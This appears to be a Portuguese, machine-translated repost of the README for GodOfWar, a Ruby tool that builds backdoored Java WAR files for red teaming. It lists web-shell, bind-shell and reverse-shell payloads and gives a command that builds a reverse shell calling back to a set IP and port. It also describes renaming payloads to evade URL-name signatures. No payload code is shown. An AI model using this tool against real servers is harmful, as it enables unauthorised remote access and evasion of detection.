GodOfWar – Malwared Java WAR Builder com payloads embutidos

Uma ferramenta de linha de comando para gerar cargas úteis de guerra para fins de testes de penetração / red teaming , escritos em ruby.
Características

  • Cargas úteis pré-existentes. (tente -l/--list)
    • cmd_get
    • navegador de arquivos
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Backdoor configurável. (tente --host/-port)
  • Controle sobre o nome da carga útil .
    • Para evitar o nome mal-intencionado após a implantação para ignorar as assinaturas de nomes de URL.

Instalação

$ gem install godofwar

Uso

$ godofwar -h 

Help menu:
   -p, --payload PAYLOAD            Generates war from one of the available payloads.
                                        (check -l/--list)
   -H, --host IP_ADDR               Local or Remote IP address for the chosen payload
                                        (used with -p/--payload)
   -P, --port PORT                  Local or Remote Port for the chosen payload
                                        (used with -p/--payload)
   -o, --output [FILE]              Output file and the deployment name.
                                        (default is the payload original name. check '-l/--list')
   -l, --list                       list all available payloads.
   -h, --help                       Show this help message.

Exemplo 
Listar todas as cargas úteis

$ godofwar -l
├── cmd_get
│   └── Information:
│       ├── Description: Command execution via web interface
│       ├── OS:          any
│       ├── Settings:    {"false"=>"No Settings required!"}
│       ├── Usage:       http://host/cmd.jsp?cmd=whoami
│       ├── References:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Information:
│       ├── Description: Remote file browser, upload, download, unzip files and native command execution
│       ├── OS:          any
│       &#9500   ;── Settings:    {"false"=>"No Settings required!"}
│       ├── Usage:       http://host/filebrowser.jsp
│       ├── References:  ["http://www.vonloesch.de/filebrowser.html"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Information:
│       ├── Description: TCP bind shell
│       ├── OS:          any
│       ├── Settings:    {"port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse-shell.jsp
│       ├── References:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│       └   ── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Information:
│       ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│       ├── OS:          any
│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse_shell_ui.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Information:
│       ├── De   scription: TCP reverse shell. LHOST and LPORT are hardcoded
│       ├── OS:          any
│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse_shell.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Gere payload com LHOST e LPORT

godofwar -p reverse_shell -H 192.168.100.10  -P 9911 -o puppy

Após a implantação, você pode visitar o seu escudo em ( http: // host: 8080 / cachorro / puppy.jsp ) 

Contribuindo

  1. Bifurque-o ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Crie sua ramificação de funcionalidades (git checkout -b my-new-feature).
  3. Confirme suas alterações (git commit -am ‘Add some feature’).
  4. Empurre para o ramo (git push origin my-new-feature).
  5. Crie uma nova solicitação de extração.

Adicionar mais backdoors
Para contribuir adicionando mais backdoors:

  1. crie uma nova pasta no payloadsdiretório.
  2. coloque seu jsparquivo sob o diretório recém-criado (torne-o o mesmo nome de diretório).
  3. atualizar payloads_info.jsonarquivo com
    1. descrição.
    2. sistema operacional suportado (tente torná-lo universal).
    3. configurações: host e porta padrão.
    4. Referências: a origem da carga útil ou seus créditos de criador.

Baixar Godofwar

Seja o primeiro a comentar

Deixe uma resposta

O seu endereço de email não será publicado.


*